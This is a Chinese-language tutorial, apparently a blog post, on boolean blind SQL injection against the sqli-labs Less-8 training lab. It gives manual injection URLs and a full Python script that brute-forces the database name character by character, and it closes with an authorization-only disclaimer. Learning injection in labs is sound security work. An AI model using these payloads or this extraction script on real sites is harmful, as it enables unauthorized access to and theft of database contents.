SQL盲注之python脚本自动化注入

SQL盲注

sql盲注无法使用sql语句注入，需要大量的判断语句或者延时注入。这样手动注入方式比较慢，手动发现注入点后可以使用python编写脚本注入。

手动注入

测试环境

测试环境sql-libs less8中的布尔注入

手动注入语句

?id=1' and length((select database()))=8--+
/?id=1%27%20and%20ascii(substr((select%20database()),1,1))=115--+

不正确时页面显示内容

正确时页面显示内容

就可以遍历访问url，然后匹配响应包中的内容是否包含You are in等特殊字段。

python脚本自动化注入

需求使用python脚本自动化注入，使用python脚本跑出测试环境中的数据库名称。

分解需求，
首先测试网站是否可以正常访问
其次遍历测试数据库的长度
最后遍历测试数据库名称

测试能否正常访问

url = "http://test.com/Less-8/"
# 按实践的地址
url_template = "http://test.com/Less-8/?id=1' and length((select database()))=8--+"
len = 0
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 '
                 '(KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
# 发送get请求      
response = requests.get(url_template,headers = headers)
# 查看请求状态是否为200
print(response)

遍历测试数据库长度

def GetDBName():
    # 获取数据库的长度
    print("----------测试数据库长度--------------")
    url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"
    for i in range(1, 99):
        current_url = url_template.format(i)
        response = requests.get(current_url, headers=headers)
        if re.search(r'You are in',response.text):
            len = i
            print("数据库长度为：", i)
            break

遍历测试数据库名称

def GetDBName():
    # 获取数据库的长度
    print("----------测试数据库长度--------------")
    url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"
    for i in range(1, 99):
        current_url = url_template.format(i)
        response = requests.get(current_url, headers=headers)
        if re.search(r'You are in',response.text):
            len = i
            print("数据库长度为：", i)
            break

    # 测试数据库名称
    print("----------测试数据库名--------------")
    DBname = ''
    url_template1 = "http://test.com/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),{},1))={}--+"
    for i in range(1, len+1):
        for j in range(33, 127):
            # 拼接构造需要的测试的URL地址，通过format函数批量构造
            current_url1 = url_template1.format(i, j)
#            print(current_url1)

            # 发送请求
            response1 = requests.get(current_url1, headers=headers)

            # 判断是否成功
            if re.search(r'You are in', response1.text):
                DBname += chr(j)
                print("数据库名为：", DBname)
                break

效果图

跑出数据库名称即可，测试点到为止。

完整代码

# 导入requests发送请求，导入re正则表达式对响应包进行筛选
import re
import requests


# 首先测试一下是否能够正常访问到测试地址
url = "http://test.com"
url_template = "http://test.com/Less-8/?id=1' and length((select database()))=8--+"
len = 0
# DBname = ''
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 '
                 '(KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
response = requests.get(url_template,headers = headers)
print(response)


def GetDBName():
    # 获取数据库的长度
    print("----------测试数据库长度--------------")
    url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"
    for i in range(1, 99):
        current_url = url_template.format(i)
        response = requests.get(current_url, headers=headers)
        if re.search(r'You are in',response.text):
            len = i
            print("数据库长度为：", i)
            break

    # 测试数据库名称
    print("----------测试数据库名--------------")
    DBname = ''
    url_template1 = "http://test.com/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),{},1))={}--+"
    for i in range(1, len+1):
        for j in range(33, 127):
            # 拼接构造需要的测试的URL地址，通过format函数批量构造
            current_url1 = url_template1.format(i, j)
#            print(current_url1)

            # 发送请求
            response1 = requests.get(current_url1, headers=headers)

            # 判断是否成功
            if re.search(r'You are in', response1.text):
                DBname += chr(j)
                print("数据库名为：", DBname)
                break

if __name__ == '__main__':
    GetDBName()

说明

PS：请授权后再测试，禁止未授权进行渗透测试。使用代码默认是接受授权测试。请按照当地法规进行测试。